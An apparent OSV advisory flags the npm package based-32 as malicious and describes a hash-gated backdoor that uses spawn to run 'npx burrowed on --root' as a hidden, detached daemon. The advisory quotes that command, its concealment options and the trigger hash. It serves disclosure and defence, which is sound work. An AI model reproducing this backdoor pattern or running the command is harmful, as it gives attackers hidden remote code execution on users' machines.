based-32@1.0.1

Vulnerability report · Last retrieved from osv.dev June 25, 2026 at 10:42 AM UTC

Malicious

OSV ID

MAL-2026-6447

Ecosystem

npm

Summary

based-32 advertises itself as a zero-dependency RFC 4648 Base32 encoding library, but dist/index.js ships a hidden trigger inside the exported handleSecureEncode() function (also reachable through the based32 -s <data> CLI). The function passes the caller's input through checkSecurityProtocol(), which SHA-256-hashes the input and compares the digest against the hardcoded constant SECURITY_HASH = "71c37c896ba7d9164cc91cb4507df9d3f42bd2ce728a93673b3dabfda45c7ed2". On a match it executes spawn('npx', ['burrowed', 'on', '--root'], { detached: true, stdio: 'ignore', windowsHide: true, shell: true }) and calls unref() on the child, so the remote burrowed npm package is fetched and run as a detached, stdio-suppressed, window-hidden daemon that outlives the calling process. The surrounding try/catch swallows every error, so failures are silent. The naming (SECURITY_HASH, checkSecurityProtocol, handleSecureEncode) is a cover story: none of this behavior is documented in the README, and no Base32-related purpose requires the package to spawn npx, fetch a remote package, or run a daemon. Any environment in which an attacker can deliver the magic input string to handleSecureEncode (or invoke based32 -s with it) gains arbitrary remote code execution as a hidden background process running under the installing user's account.

Source: amazon-inspector (52ca241d887ed83628c8c4a4432ca0f832d092e6058c7ab4250cc5b169ba7fb9)
